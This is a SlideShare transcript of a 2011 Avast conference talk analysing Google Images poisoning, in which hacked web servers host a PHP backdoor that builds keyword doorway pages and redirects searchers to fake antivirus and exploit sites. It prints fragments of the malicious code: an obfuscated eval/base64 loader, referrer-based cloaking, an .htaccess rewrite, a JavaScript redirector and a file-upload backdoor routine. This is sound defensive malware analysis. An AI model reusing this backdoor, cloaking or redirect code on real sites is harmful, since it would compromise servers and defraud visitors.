SlideShare a Scribd company logo

Google-image poisoning: How hackers use images to spread malware

Avast
Avast

This document discusses Google image poisoning attacks, which use hacked sites to redirect users searching for images to sites containing fake antivirus software or exploits. The attacks work by generating keyword-rich pages with hotlinked images that are indexed highly by search bots. An evolving PHP script is used to create spam pages, change server settings, download malicious files, and redirect users to the fake sites. Data from Avast shows over 22,000 infected domains have been detected between March and August 2011 through this method.

Internet
1 of 37
Analysis of Google Images Poisoning Lukáš Hasík Jan Širmer www.avast.com
AVAR 2011 Agenda • What is Google-images poisoning? • How it works • Doorway generator • Java script redirector • Evolution • Data from AVAST CommunityIQ userbase • Summary • Questions www.avast.com
AVAR 2011 Google Images poisoning • SEO blackhat poisoning attack • Uses hacked sites to redirect users to sites containing fake AV or exploit • Uses key-word rich pages with hot-linked images for higher indexing by search bots • Images from hacked sites are near the top search results • Focused on users coming from well-know search engines www.avast.com
AVAR 2011 Google Images poisoning www.avast.com User Infected server How it works?
AVAR 2011 Google search results www.avast.com
AVAR 2011 Google Images poisoning www.avast.com User Infected server Remote serverFake AV
AVAR 2011 Fake antiviruses www.avast.com
AVAR 2011 Google Images poisoning www.avast.com User Infected server Remote serverFake AV Bad guy
AVAR 2011 Why is it so successful? www.avast.com • Great SEO and nobody used SEO for “images”
AVAR 2011 Why is it so successful? (2) www.avast.com Infected serverFake AV • Computer users do not expect that they can get infected when searching for images on legitimate sites
AVAR 2011 Why is it so successful? (3) • Hide and Seek – if users are using Opera browser or they are coming from Google, Yahoo or a Bing, they are served a Java script redirector www.avast.com Malicious content
AVAR 2011 Your website gets infected • The bad guys are using stolen FTP credentials • They upload PHP script to the WEB server • This is used for uploading malicious content to the web server, creating spam pages, and uploading additional files to web server • Bonus feature - it lets the owners know that the page is ready www.avast.com
AVAR 2011 Additional malicious files • Xmlrpc.txt – Remote server address stored • -> Xml.txt -> Xml.cgi – address in Base64 • Iog.txt – Redirecting java script stored • Shab100500.txt – Spam HTML template stored • -> Don.txt – HTML template in Base64 www.avast.com
AVAR 2011 PHP script on infected sites • Earlier, they used names such as d{1,3}.php • Today, they use names like microphone.php, etc. • This script is responsible for: 1. Creating spam pages for Google bot indexing 2. Changing .htaccess 3. Serving redirect script to user to exploit sites 4. Serving redirect script to user to fake AV 5. Downloading malicious files to server 6. Telling owners that the site is ready www.avast.com
AVAR 2011 PHP script Original PHP file uploaded to server • <?eval (gzuncompress (base64_decode('eNqVWG2P4kYM/…/woBlZVj C9zK2Ok8McOZrF5z9hfM+5P/AbQiT9I=') ) ); ?> www.avast.com
AVAR 2011 PHP script PHP file after first step of deobfuscation • $GLOBALS['_1600532410_']=Array(base64_dec ode('ZXJyb3Jfcm'.'Vwb3J0'.'aW5'.'n • Function _1070120820($i) {$a=Array('c'.'Q='.'=','cQ==', • ($GLOBALS['_1600532410_'][16]( _1070120820(6))) {… www.avast.com
AVAR 2011 PHP script after removing obfuscation if (strpos($_SERVER['HTTP_USER_AGENT'], 'Opera') !== false) { } if (strpos($_SERVER['HTTP_REFERER'], 'google.') || strpos($_SERVER['HTTP_REFERER'], 'yahoo.') || strpos($_SERVER['HTTP_REFERER'], 'bing.') > 0) { $_10 = file_get_contents('.log/' . $_4 . '/xmlrpc.txt'); www.avast.com
Doorway generator • HTML template is stored in the file .log/SITE/shab100500.txt • In the new version, shab100500.txt was replaced by don.txt www.avast.com <HTML> Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco </HTML> <Replaceme> </Replaceme>
Doorway generator • Get descriptions of top 50 ‘search keywords’ from Google web • Shuffle the words into their descriptions to get unique text www.avast.com harmful action against a person or group in response revenge to a grievance, be it real or rick santorum perceived
Doorway generator • Get top 20 ‘search keyword’ from Google Images and extract links to image files • Generates <img> tags and shuffle them www.avast.com <img src="http://SITE/p ath/hot-linked- image.jpg" alt="search keywords" align="random(cent er, right, left)">
Doorway generator www.avast.com harmful action against a person or group in response revenge to a grievance, be it real or rick santorum perceived <img src="http://SITE/p ath/hot-linked- image.jpg" alt="search keywords" align="random(cent er, right, left)"> harmful action against a person or group in response revenge to a grievance<img src="http://SITE/path/hot- linked-image.jpg" alt="search keywords" align="random(center, right, left)">
Doorway generator www.avast.com <HTML> Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco </HTML> <Replaceme> </Replaceme> <h1>SEARCH KEYWORD</h1> Suggested links Links to 30 most recently generated links Rich-word generated text with hot-linked images Links to alternative pages
AVAR 2011 How do they make image URLs less suspicious? • "RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ ".$_SERVER[ 'SCRIPT_NAME'."?q=$1 [L] “ • this changes URL from suspicious http://SITE/wp-admin/BAD.php?q=search-keywords to http://SITE/wp-admin/search-keywords www.avast.com
AVAR 2011 PHP script evolution • The first version was focused on all users using Opera browser or users coming from Google, Yahoo or Bing • During June, we found some changes in PHP code - Google is the only target - New redirection system • Request goes to a remote server ( mydiarycom.net ) - centralized • They have statistic data from parameters • No need to update iog.txt (redirecting script) or make differentiating changes on each server www.avast.com
AVAR 2011 Data parameters http://mydiarycom.net/out/stat.cgi?parameter= 1. Name of the doorway site 2. The full URL of doorway script 3. Visitor’s IP 4. The referring URL 5. The User-Agent of the user’s browser 6. The search query used on Google www.avast.com
AVAR 2011 IP address and user-agents www.avast.com Fake AV
AVAR 2011 IP address and user-agents www.avast.com Spam page
AVAR 2011 JavaScript redirector var URL = “SITE contains FakeAV” +encodeURIComponent(document.referrer) +"&parameter=$keyword&se=$se&ur=1&HTTP_REF ERER=“ +encodeURIComponent(document.URL) +"&default_keyword=default"; if (window!=top) {top.location.href = URL;} else document.location= URL; www.avast.com
AVAR 2011 Redirection • Mac – http://IP/r/RANDOM_STRING IP and ‘r’ are change every 30 minutes • Exploit site - http://SITE/index.php?tp=RANDOM_STRING Site and ‘tp’ are change every 30 minutes • Fake AV – http://SITE/fast-scan/ www.avast.com
AVAR 2011 Other changes • Rotating user-agent string • Password-protected maintenance request Someone who know how this algorithm works can easily change it and redirect to his or her own site • Xml.txt was replaced by xml.cgi • Working with free blogs sites www.avast.com
AVAR 2011 Password-protected maintenance request if ($_GET[ 'dom100500' != '' { $_13 = fopen( '.log/'$_4. '/xmlrpc.txt' 'w+'; fwrite($_13,$_GET[ 'dom100500'); fclose($_13); if ($_GET[ 'up100500' != '' { $_14 = '' $_14 = $_14 . basename( $_FILES[ 'uploaded'[ 'name') ; $_15=round(0+0.5+0.5); if(move_uploaded_file($_FILES[ 'uploaded'[ 'tmp_name', $_14)) www.avast.com
AVAR 2011 Data from the AVAST CommunityIQ • From March to August 2011, we discovered 22,580 unique infected sites • 5,698 sites are still infected • Typo : <IMG HEIGTH=?1?WIDTH www.avast.com
AVAR 2011 Infected domains www.avast.com
AVAR 2011 Number of infected domains www.avast.com
AVAR 2011 Summary • Google-image poisoning is an easy way how to spread fake AV and exploits • It’s based on stolen FTP credentials of webmasters and great backdoor algorithms • The number of infected legitimate domains is growing every day • Common sense is not sufficient protection www.avast.com
AVAR 2011 Questions and Answers www.avast.com
AVAR 2011 Thank you Jan Sirmer (sirmer@avast.com) Senior Virus Analyst Lukas Hasik (hasik@avast.com) QA Director www.avast.com

Recommended

Poisoning Google images
Poisoning Google imagesPoisoning Google images
Poisoning Google images
lukash4
 
What should I do when my website got hack?
What should I do when my website got hack?What should I do when my website got hack?
What should I do when my website got hack?
Sumedt Jitpukdebodin
 
Consuming & embedding external content in WordPress
Consuming & embedding external content in WordPressConsuming & embedding external content in WordPress
Consuming & embedding external content in WordPress
Akshay Raje
 
Api
ApiApi
Api
randyhoyt
 
Build a Node.js Client for Your REST+JSON API
Build a Node.js Client for Your REST+JSON APIBuild a Node.js Client for Your REST+JSON API
Build a Node.js Client for Your REST+JSON API
Stormpath
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
AWS Elastic Beanstalk
AWS Elastic BeanstalkAWS Elastic Beanstalk
AWS Elastic Beanstalk
Amazon Web Services
 
The never-ending REST API design debate
The never-ending REST API design debateThe never-ending REST API design debate
The never-ending REST API design debate
Restlet
 

Recommended

Poisoning Google images
Poisoning Google imagesPoisoning Google images
Poisoning Google images
lukash4
 
What should I do when my website got hack?
What should I do when my website got hack?What should I do when my website got hack?
What should I do when my website got hack?
Sumedt Jitpukdebodin
 
Consuming & embedding external content in WordPress
Consuming & embedding external content in WordPressConsuming & embedding external content in WordPress
Consuming & embedding external content in WordPress
Akshay Raje
 
Api
ApiApi
Api
randyhoyt
 
Build a Node.js Client for Your REST+JSON API
Build a Node.js Client for Your REST+JSON APIBuild a Node.js Client for Your REST+JSON API
Build a Node.js Client for Your REST+JSON API
Stormpath
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
AWS Elastic Beanstalk
AWS Elastic BeanstalkAWS Elastic Beanstalk
AWS Elastic Beanstalk
Amazon Web Services
 
The never-ending REST API design debate
The never-ending REST API design debateThe never-ending REST API design debate
The never-ending REST API design debate
Restlet
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
Building an API Security Ecosystem
Building an API Security EcosystemBuilding an API Security Ecosystem
Building an API Security Ecosystem
Prabath Siriwardena
 
Rest API Security
Rest API SecurityRest API Security
Rest API Security
Stormpath
 
Extreme APIs for a better tomorrow
Extreme APIs for a better tomorrowExtreme APIs for a better tomorrow
Extreme APIs for a better tomorrow
Aaron Maturen
 
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
Matt Raible
 
StirTrek 2018 - Rapid API Development with Sails
StirTrek 2018 - Rapid API Development with SailsStirTrek 2018 - Rapid API Development with Sails
StirTrek 2018 - Rapid API Development with Sails
Justin James
 
REST API Design for JAX-RS And Jersey
REST API Design for JAX-RS And JerseyREST API Design for JAX-RS And Jersey
REST API Design for JAX-RS And Jersey
Stormpath
 
Invoke-DOSfuscation
Invoke-DOSfuscationInvoke-DOSfuscation
Invoke-DOSfuscation
Daniel Bohannon
 
Twitter APIs for #MediaHackday
Twitter APIs for #MediaHackdayTwitter APIs for #MediaHackday
Twitter APIs for #MediaHackday
Andy Piper
 
Do you want a SDK with that API? (Nordic APIS April 2014)
Do you want a SDK with that API? (Nordic APIS April 2014)Do you want a SDK with that API? (Nordic APIS April 2014)
Do you want a SDK with that API? (Nordic APIS April 2014)Nordic APIs
 
A Tour of Wyriki
A Tour of WyrikiA Tour of Wyriki
A Tour of Wyriki
Mark Menard
 
Attacking and Defending Mobile Applications
Attacking and Defending Mobile ApplicationsAttacking and Defending Mobile Applications
Attacking and Defending Mobile Applications
Jerod Brennen
 
Finding things on the web with BOSS
Finding things on the web with BOSSFinding things on the web with BOSS
Finding things on the web with BOSS
Christian Heilmann
 
Hacker, you shall not pass!
Hacker, you shall not pass!Hacker, you shall not pass!
Hacker, you shall not pass!
Cláudio André
 
Security Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress MeetupSecurity Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress Meetup
Angela Bowman
 
Securing WordPress
Securing WordPressSecuring WordPress
Securing WordPress
Shawn Hooper
 
Connecting to the Pulse of the Planet with the Twitter Platform
Connecting to the Pulse of the Planet with the Twitter PlatformConnecting to the Pulse of the Planet with the Twitter Platform
Connecting to the Pulse of the Planet with the Twitter Platform
Andy Piper
 
Getting Started With Angular
Getting Started With AngularGetting Started With Angular
Getting Started With Angular
Stormpath
 
腾讯大讲堂09 如何建设高性能网站
腾讯大讲堂09 如何建设高性能网站腾讯大讲堂09 如何建设高性能网站
腾讯大讲堂09 如何建设高性能网站areyouok
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
Mikhail Egorov
 
腾讯大讲堂09 如何建设高性能网站
腾讯大讲堂09 如何建设高性能网站腾讯大讲堂09 如何建设高性能网站
腾讯大讲堂09 如何建设高性能网站George Ang
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
Volkan Özçelik
 

More Related Content

What's hot

How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
Building an API Security Ecosystem
Building an API Security EcosystemBuilding an API Security Ecosystem
Building an API Security Ecosystem
Prabath Siriwardena
 
Rest API Security
Rest API SecurityRest API Security
Rest API Security
Stormpath
 
Extreme APIs for a better tomorrow
Extreme APIs for a better tomorrowExtreme APIs for a better tomorrow
Extreme APIs for a better tomorrow
Aaron Maturen
 
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
Matt Raible
 
StirTrek 2018 - Rapid API Development with Sails
StirTrek 2018 - Rapid API Development with SailsStirTrek 2018 - Rapid API Development with Sails
StirTrek 2018 - Rapid API Development with Sails
Justin James
 
REST API Design for JAX-RS And Jersey
REST API Design for JAX-RS And JerseyREST API Design for JAX-RS And Jersey
REST API Design for JAX-RS And Jersey
Stormpath
 
Invoke-DOSfuscation
Invoke-DOSfuscationInvoke-DOSfuscation
Invoke-DOSfuscation
Daniel Bohannon
 
Twitter APIs for #MediaHackday
Twitter APIs for #MediaHackdayTwitter APIs for #MediaHackday
Twitter APIs for #MediaHackday
Andy Piper
 
Do you want a SDK with that API? (Nordic APIS April 2014)
Do you want a SDK with that API? (Nordic APIS April 2014)Do you want a SDK with that API? (Nordic APIS April 2014)
Do you want a SDK with that API? (Nordic APIS April 2014)Nordic APIs
 
A Tour of Wyriki
A Tour of WyrikiA Tour of Wyriki
A Tour of Wyriki
Mark Menard
 
Attacking and Defending Mobile Applications
Attacking and Defending Mobile ApplicationsAttacking and Defending Mobile Applications
Attacking and Defending Mobile Applications
Jerod Brennen
 
Finding things on the web with BOSS
Finding things on the web with BOSSFinding things on the web with BOSS
Finding things on the web with BOSS
Christian Heilmann
 
Hacker, you shall not pass!
Hacker, you shall not pass!Hacker, you shall not pass!
Hacker, you shall not pass!
Cláudio André
 
Security Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress MeetupSecurity Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress Meetup
Angela Bowman
 
Securing WordPress
Securing WordPressSecuring WordPress
Securing WordPress
Shawn Hooper
 
Connecting to the Pulse of the Planet with the Twitter Platform
Connecting to the Pulse of the Planet with the Twitter PlatformConnecting to the Pulse of the Planet with the Twitter Platform
Connecting to the Pulse of the Planet with the Twitter Platform
Andy Piper
 
Getting Started With Angular
Getting Started With AngularGetting Started With Angular
Getting Started With Angular
Stormpath
 
腾讯大讲堂09 如何建设高性能网站
腾讯大讲堂09 如何建设高性能网站腾讯大讲堂09 如何建设高性能网站
腾讯大讲堂09 如何建设高性能网站areyouok
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
Mikhail Egorov
 

What's hot (20)

How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
Building an API Security Ecosystem
Building an API Security EcosystemBuilding an API Security Ecosystem
Building an API Security Ecosystem
 
Rest API Security
Rest API SecurityRest API Security
Rest API Security
 
Extreme APIs for a better tomorrow
Extreme APIs for a better tomorrowExtreme APIs for a better tomorrow
Extreme APIs for a better tomorrow
 
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
 
StirTrek 2018 - Rapid API Development with Sails
StirTrek 2018 - Rapid API Development with SailsStirTrek 2018 - Rapid API Development with Sails
StirTrek 2018 - Rapid API Development with Sails
 
REST API Design for JAX-RS And Jersey
REST API Design for JAX-RS And JerseyREST API Design for JAX-RS And Jersey
REST API Design for JAX-RS And Jersey
 
Invoke-DOSfuscation
Invoke-DOSfuscationInvoke-DOSfuscation
Invoke-DOSfuscation
 
Twitter APIs for #MediaHackday
Twitter APIs for #MediaHackdayTwitter APIs for #MediaHackday
Twitter APIs for #MediaHackday
 
Do you want a SDK with that API? (Nordic APIS April 2014)
Do you want a SDK with that API? (Nordic APIS April 2014)Do you want a SDK with that API? (Nordic APIS April 2014)
Do you want a SDK with that API? (Nordic APIS April 2014)
 
A Tour of Wyriki
A Tour of WyrikiA Tour of Wyriki
A Tour of Wyriki
 
Attacking and Defending Mobile Applications
Attacking and Defending Mobile ApplicationsAttacking and Defending Mobile Applications
Attacking and Defending Mobile Applications
 
Finding things on the web with BOSS
Finding things on the web with BOSSFinding things on the web with BOSS
Finding things on the web with BOSS
 
Hacker, you shall not pass!
Hacker, you shall not pass!Hacker, you shall not pass!
Hacker, you shall not pass!
 
Security Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress MeetupSecurity Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress Meetup
 
Securing WordPress
Securing WordPressSecuring WordPress
Securing WordPress
 
Connecting to the Pulse of the Planet with the Twitter Platform
Connecting to the Pulse of the Planet with the Twitter PlatformConnecting to the Pulse of the Planet with the Twitter Platform
Connecting to the Pulse of the Planet with the Twitter Platform
 
Getting Started With Angular
Getting Started With AngularGetting Started With Angular
Getting Started With Angular
 
腾讯大讲堂09 如何建设高性能网站
腾讯大讲堂09 如何建设高性能网站腾讯大讲堂09 如何建设高性能网站
腾讯大讲堂09 如何建设高性能网站
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 

Similar to Google-image poisoning: How hackers use images to spread malware

腾讯大讲堂09 如何建设高性能网站
腾讯大讲堂09 如何建设高性能网站腾讯大讲堂09 如何建设高性能网站
腾讯大讲堂09 如何建设高性能网站George Ang
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
Volkan Özçelik
 
Web-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting EnginesWeb-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting Engines
c0c0n - International Cyber Security and Policing Conference
 
WordPress Security and Best Practices
WordPress Security and Best PracticesWordPress Security and Best Practices
WordPress Security and Best Practices
Robert Vidal
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Volkan Özçelik
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best Practices
Volkan Özçelik
 
GDD Japan 2009 - Designing OpenSocial Apps For Speed and Scale
GDD Japan 2009 - Designing OpenSocial Apps For Speed and ScaleGDD Japan 2009 - Designing OpenSocial Apps For Speed and Scale
GDD Japan 2009 - Designing OpenSocial Apps For Speed and Scale
Patrick Chanezon
 
Google Hacking 101
Google Hacking 101Google Hacking 101
Google Hacking 101
Sais Abdelkrim
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Hacking Wordpress Plugins
Hacking Wordpress PluginsHacking Wordpress Plugins
Hacking Wordpress Plugins
Larry Cashdollar
 
Are you ready to be hacked?
Are you ready to be hacked?Are you ready to be hacked?
Are you ready to be hacked?
Daniel Kanchev
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
CA API Management
 
EscConf - Deep Dive Frontend Optimization
EscConf - Deep Dive Frontend OptimizationEscConf - Deep Dive Frontend Optimization
EscConf - Deep Dive Frontend Optimization
Jonathan Klein
 
Disrupting the application eco system with progressive web applications
Disrupting the application eco system with progressive web applicationsDisrupting the application eco system with progressive web applications
Disrupting the application eco system with progressive web applications
Chris Love
 
Android lessons you won't learn in school
Android lessons you won't learn in schoolAndroid lessons you won't learn in school
Android lessons you won't learn in school
Michael Galpin
 
腾讯大讲堂09 如何建设高性能网站
腾讯大讲堂09 如何建设高性能网站腾讯大讲堂09 如何建设高性能网站
腾讯大讲堂09 如何建设高性能网站
topgeek
 
Behavior Driven Development and Automation Testing Using Cucumber
Behavior Driven Development and Automation Testing Using CucumberBehavior Driven Development and Automation Testing Using Cucumber
Behavior Driven Development and Automation Testing Using CucumberKMS Technology
 
Selenium Tips & Tricks - StarWest 2015
Selenium Tips & Tricks - StarWest 2015Selenium Tips & Tricks - StarWest 2015
Selenium Tips & Tricks - StarWest 2015
Andrew Krug
 
HTML for the Mobile Web, Firefox OS
HTML for the Mobile Web, Firefox OSHTML for the Mobile Web, Firefox OS
HTML for the Mobile Web, Firefox OS
All Things Open
 
API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014
JonAbrams
 

Similar to Google-image poisoning: How hackers use images to spread malware (20)

腾讯大讲堂09 如何建设高性能网站
腾讯大讲堂09 如何建设高性能网站腾讯大讲堂09 如何建设高性能网站
腾讯大讲堂09 如何建设高性能网站
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
 
Web-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting EnginesWeb-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting Engines
 
WordPress Security and Best Practices
WordPress Security and Best PracticesWordPress Security and Best Practices
WordPress Security and Best Practices
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best Practices
 
GDD Japan 2009 - Designing OpenSocial Apps For Speed and Scale
GDD Japan 2009 - Designing OpenSocial Apps For Speed and ScaleGDD Japan 2009 - Designing OpenSocial Apps For Speed and Scale
GDD Japan 2009 - Designing OpenSocial Apps For Speed and Scale
 
Google Hacking 101
Google Hacking 101Google Hacking 101
Google Hacking 101
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Hacking Wordpress Plugins
Hacking Wordpress PluginsHacking Wordpress Plugins
Hacking Wordpress Plugins
 
Are you ready to be hacked?
Are you ready to be hacked?Are you ready to be hacked?
Are you ready to be hacked?
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
 
EscConf - Deep Dive Frontend Optimization
EscConf - Deep Dive Frontend OptimizationEscConf - Deep Dive Frontend Optimization
EscConf - Deep Dive Frontend Optimization
 
Disrupting the application eco system with progressive web applications
Disrupting the application eco system with progressive web applicationsDisrupting the application eco system with progressive web applications
Disrupting the application eco system with progressive web applications
 
Android lessons you won't learn in school
Android lessons you won't learn in schoolAndroid lessons you won't learn in school
Android lessons you won't learn in school
 
腾讯大讲堂09 如何建设高性能网站
腾讯大讲堂09 如何建设高性能网站腾讯大讲堂09 如何建设高性能网站
腾讯大讲堂09 如何建设高性能网站
 
Behavior Driven Development and Automation Testing Using Cucumber
Behavior Driven Development and Automation Testing Using CucumberBehavior Driven Development and Automation Testing Using Cucumber
Behavior Driven Development and Automation Testing Using Cucumber
 
Selenium Tips & Tricks - StarWest 2015
Selenium Tips & Tricks - StarWest 2015Selenium Tips & Tricks - StarWest 2015
Selenium Tips & Tricks - StarWest 2015
 
HTML for the Mobile Web, Firefox OS
HTML for the Mobile Web, Firefox OSHTML for the Mobile Web, Firefox OS
HTML for the Mobile Web, Firefox OS
 
API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014
 

More from Avast

Home Security Map of the World
Home Security Map of the World Home Security Map of the World
Home Security Map of the World
Avast
 
IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018 IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018
Avast
 
Avast @ Machine Learning
Avast @ Machine LearningAvast @ Machine Learning
Avast @ Machine Learning
Avast
 
Avast Q1 Security Report 2015
Avast Q1 Security Report 2015Avast Q1 Security Report 2015
Avast Q1 Security Report 2015
Avast
 
Where There's Money, There's Crime: Web-based Threats
Where There's Money, There's Crime: Web-based ThreatsWhere There's Money, There's Crime: Web-based Threats
Where There's Money, There's Crime: Web-based Threats
Avast
 
Korean Banks Under Pressure
Korean Banks Under PressureKorean Banks Under Pressure
Korean Banks Under Pressure
Avast
 
Every Click Counts (But All the Money Goes to Me)
Every Click Counts (But All the Money Goes to Me)Every Click Counts (But All the Money Goes to Me)
Every Click Counts (But All the Money Goes to Me)
Avast
 

More from Avast (7)

Home Security Map of the World
Home Security Map of the World Home Security Map of the World
Home Security Map of the World
 
IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018 IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018
 
Avast @ Machine Learning
Avast @ Machine LearningAvast @ Machine Learning
Avast @ Machine Learning
 
Avast Q1 Security Report 2015
Avast Q1 Security Report 2015Avast Q1 Security Report 2015
Avast Q1 Security Report 2015
 
Where There's Money, There's Crime: Web-based Threats
Where There's Money, There's Crime: Web-based ThreatsWhere There's Money, There's Crime: Web-based Threats
Where There's Money, There's Crime: Web-based Threats
 
Korean Banks Under Pressure
Korean Banks Under PressureKorean Banks Under Pressure
Korean Banks Under Pressure
 
Every Click Counts (But All the Money Goes to Me)
Every Click Counts (But All the Money Goes to Me)Every Click Counts (But All the Money Goes to Me)
Every Click Counts (But All the Money Goes to Me)
 

Recently uploaded

History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shopHistory+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
laozhuseo02
 
BASIC C++ lecture NOTE C++ lecture 3.pptx
BASIC C++ lecture NOTE C++ lecture 3.pptxBASIC C++ lecture NOTE C++ lecture 3.pptx
BASIC C++ lecture NOTE C++ lecture 3.pptx
natyesu
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC
 
The+Prospects+of+E-Commerce+in+China.pptx
The+Prospects+of+E-Commerce+in+China.pptxThe+Prospects+of+E-Commerce+in+China.pptx
The+Prospects+of+E-Commerce+in+China.pptx
laozhuseo02
 
